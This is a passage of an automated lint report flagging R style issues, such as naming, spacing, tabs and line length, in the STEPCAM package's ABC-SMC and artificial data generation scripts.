lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:247:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:247:17:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:248:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:248:17:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:249:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:249:17:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:250:16:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:21:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:252:31:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:252:41:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:252:51:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:253:21:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:253:29:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:253:37:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:254:54:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L254) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:257:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L257) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:35:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:51:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:258:9:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:32:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:258:37:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L261) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:262:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:263:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:264:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:271:61:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:275:63:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:278:15:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:279:44:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L279) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix 